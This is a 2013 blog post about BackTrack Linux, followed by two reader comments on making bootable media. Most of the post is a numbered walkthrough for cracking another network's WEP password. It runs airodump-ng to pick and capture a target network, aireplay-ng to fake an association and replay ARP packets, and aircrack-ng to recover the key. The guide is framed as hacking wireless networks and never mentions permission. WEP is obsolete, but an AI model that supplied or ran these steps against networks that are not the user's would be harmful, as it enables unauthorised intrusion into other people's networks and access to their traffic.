Friday, February 8, 2013

Crack WEP password : Using specialized linux version: BackTrack Linux

Post Your Ads on this blog's posts for FREE any place you want !!!

Hello everybody! In this post I will be telling about the Linux security distribution: BackTrack Linux. BackTrack Linux is Linux-based penetration testing Operating System. It aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. You can hack or penetrate networks using tools and scripts in it. You can get a GUI interface (like Ubuntu and windows but not same) along with terminals and scripts for Hacking. If you are really interested in penetration, hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client and testing your network security then it is better to know about tools and scripts in BackTrack Linux.

You can download BackTrack 5 R3 from http://www.backtrack-linux.org/downloads/ for free.

Furthermore, I will be teaching you to hack WEP network in this post.

After you are ready with the BackTrack. You need to make bootable USB or  bootable  DVD by burning image file you downloaded in DVD.

1.     Boot using the Backtrack 4 or BackTrack 5
2.     Type "startx" and press enter to go to GUI BackTrack after you the command based screen appears.
3.     Open the 'Terminal' from Taskbar. Let’s say it Terminal1
4.     Now type: 'airodump-ng wlan0' and press Enter
This will show you the list of wifi connections that are received by your wifi receiver.
5.     Choose the wireless network from ESSID whose both ENC and CIPHER is WEP.
6.     Open next ‘Terminal’. Let’s say it Terminal2
7.     Type:’airodump-ng –w wep –c (Channel) --bssid (bssid) wlan0’ and press Enter
This will lock the wireless network. You will be able to get Channel and bssid from the corresponding row of the network in first Terminal i.e. Terminal1 where available wireless networks were shown.
8.     Open new ‘Terminal’ again. Don’t close previous Terminals. Let’s say this Terminal3
9.     Type: ‘aireplay-ng -1 0 -a (bssid of Network) wlan0’ and press Enter
This will create an association with the network that we are hacking. If ‘Association successful’ message is not shown retry it until association is successful.
10.  Open another ‘Terminal’. Let’s say this Terminal4
11. Type: ‘aireplay-ng -3 -b (bssid) wlan0’ and press Enter
This will read the packets over the network.
12. Check ‘#Data’ column in the second Terminal i.e. Terminal2 where we had locked the wireless network. You will find it to be increasing. After bunches of packets (about 1000) are read.
13.  Wait until the Data reaches about 30,000. This is required to get the wireless password easily. The more data more easy to get password.
14.  Press ctrl + c in the Terminal where packets are read i.e. in Terminal4
This stops the packed reading process.
15.  Now, type: ‘dir’ and press Enter, in the Terminal4 after packet reading is stopped.
16.  Type: ‘aircrack-ng wep-01.cap’ and press Enter
17.  The message ‘Decrypted correctly: 100%’ will be shown and just above it you will see the ‘KEY FOUND! [(key/password)]’

I will be posting some more tricks and tips on BackTrack on upcoming posts. Stay connected.

Don’t forget to give your valuable comments. And share on Facebook and Twitter.

You may be interested to read about Saving files before installing new windows
                                                             Top 5 web browsers

Thank You!

2 comments:

  1. pls tell me about the burning image file and how could i use the bootable usb

    ReplyDelete
    Replies
    1. Use Linuxlive free software from (www.linuxliveusb.com) for burning Linux versions of OS. and you can use windows use this tool (https://www.microsoft.com/en-us/download/windows-usb-dvd-download-tool)

      Delete